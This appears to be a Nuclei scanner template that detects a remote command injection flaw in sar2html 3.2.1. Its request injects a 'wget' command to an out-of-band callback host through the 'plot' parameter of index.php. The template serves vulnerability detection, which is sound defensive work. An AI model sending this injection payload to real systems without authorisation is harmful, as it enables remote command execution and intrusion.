id: sar2html-rce

info:
  name: sar2html 3.2.1 - Remote Command Injection
  author: gy741
  severity: critical
  description: |
    SAR2HTML could allow a remote attacker to execute arbitrary commands on the system via a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
  reference:
    - https://www.exploit-db.com/exploits/49344
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: sar2html,rce,oast,edb

requests:
  - raw:
      - |
        GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

# Enhanced by mp on 2022/05/30
